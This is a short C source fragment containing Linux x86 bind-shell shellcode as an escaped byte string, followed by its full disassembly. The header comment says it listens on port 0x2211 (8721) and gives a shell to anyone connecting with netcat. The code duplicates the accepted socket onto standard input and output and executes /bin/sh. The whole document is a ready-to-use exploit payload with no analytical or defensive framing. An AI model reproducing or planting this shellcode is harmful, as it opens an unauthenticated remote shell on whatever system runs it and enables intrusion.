//random

/*
#
#   bind ip:port 0.0.0.0:0x2211
#   get shell by "nc 127.0.0.1 8721"   
#
*/

char *shellcode = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x6a\x01\x6a\x02\x89\xe1\xb3"
"\x01\xb0\x66\xcd\x80\x89\xc6\x83\xc4\x0c\x31\xd2\x52\x52\x52\x66\x68"
"\x22\x11"          //port = 0x2211 
"\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x56"
"\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x83\xc4\x1c\xb2\x0a\x52\x56\x89"
"\xe1\xb3\x04\xb0\x66\xcd\x80\x83\xc4\x08\x83\xec\x04\x89\xe2\x83"
"\xec\x10\x89\xe1\x52\x51\x56\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd"
"\x80\x83\xc4\x20\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd"
"\x80\x41\xb0\x3f\xcd\x80\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x83\xc4\x14"
"\x31\xc0\x31\xdb\x40\xcd\x80";


===========

Disassembly of section .text:

08048054 <_start>:
 8048054:	31 c0                	xor    %eax,%eax
 8048056:	31 db                	xor    %ebx,%ebx
 8048058:	31 c9                	xor    %ecx,%ecx
 804805a:	31 d2                	xor    %edx,%edx
 804805c:	50                   	push   %eax
 804805d:	6a 01                	push   $0x1
 804805f:	6a 02                	push   $0x2
 8048061:	89 e1                	mov    %esp,%ecx
 8048063:	b3 01                	mov    $0x1,%bl
 8048065:	b0 66                	mov    $0x66,%al
 8048067:	cd 80                	int    $0x80
 8048069:	89 c6                	mov    %eax,%esi
 804806b:	83 c4 0c             	add    $0xc,%esp
 804806e:	31 d2                	xor    %edx,%edx
 8048070:	52                   	push   %edx
 8048071:	52                   	push   %edx
 8048072:	52                   	push   %edx
 8048073:	66 68 22 11          	pushw  $0x1122
 8048077:	b2 02                	mov    $0x2,%dl
 8048079:	66 52                	push   %dx
 804807b:	89 e1                	mov    %esp,%ecx
 804807d:	6a 10                	push   $0x10
 804807f:	51                   	push   %ecx
 8048080:	56                   	push   %esi
 8048081:	89 e1                	mov    %esp,%ecx
 8048083:	fe c3                	inc    %bl
 8048085:	b0 66                	mov    $0x66,%al
 8048087:	cd 80                	int    $0x80
 8048089:	83 c4 1c             	add    $0x1c,%esp
 804808c:	b2 0a                	mov    $0xa,%dl
 804808e:	52                   	push   %edx
 804808f:	56                   	push   %esi
 8048090:	89 e1                	mov    %esp,%ecx
 8048092:	b3 04                	mov    $0x4,%bl
 8048094:	b0 66                	mov    $0x66,%al
 8048096:	cd 80                	int    $0x80
 8048098:	83 c4 08             	add    $0x8,%esp
 804809b:	83 ec 04             	sub    $0x4,%esp
 804809e:	89 e2                	mov    %esp,%edx
 80480a0:	83 ec 10             	sub    $0x10,%esp
 80480a3:	89 e1                	mov    %esp,%ecx
 80480a5:	52                   	push   %edx
 80480a6:	51                   	push   %ecx
 80480a7:	56                   	push   %esi
 80480a8:	89 e1                	mov    %esp,%ecx
 80480aa:	31 db                	xor    %ebx,%ebx
 80480ac:	b3 05                	mov    $0x5,%bl
 80480ae:	b0 66                	mov    $0x66,%al
 80480b0:	cd 80                	int    $0x80
 80480b2:	83 c4 20             	add    $0x20,%esp
 80480b5:	89 c3                	mov    %eax,%ebx
 80480b7:	31 c9                	xor    %ecx,%ecx
 80480b9:	b0 3f                	mov    $0x3f,%al
 80480bb:	cd 80                	int    $0x80
 80480bd:	41                   	inc    %ecx
 80480be:	b0 3f                	mov    $0x3f,%al
 80480c0:	cd 80                	int    $0x80
 80480c2:	41                   	inc    %ecx
 80480c3:	b0 3f                	mov    $0x3f,%al
 80480c5:	cd 80                	int    $0x80
 80480c7:	31 d2                	xor    %edx,%edx
 80480c9:	52                   	push   %edx
 80480ca:	68 2f 2f 73 68       	push   $0x68732f2f
 80480cf:	68 2f 62 69 6e       	push   $0x6e69622f
 80480d4:	89 e3                	mov    %esp,%ebx
 80480d6:	52                   	push   %edx

 80480d7:	53                   	push   %ebx
 80480d8:	89 e1                	mov    %esp,%ecx
 80480da:	b0 0b                	mov    $0xb,%al
 80480dc:	cd 80                	int    $0x80

 80480de:	83 c4 14             	add    $0x14,%esp
 80480e1:	31 c0                	xor    %eax,%eax
 80480e3:	31 db                	xor    %ebx,%ebx
 80480e5:	40                   	inc    %eax
 80480e6:	cd 80                	int    $0x80

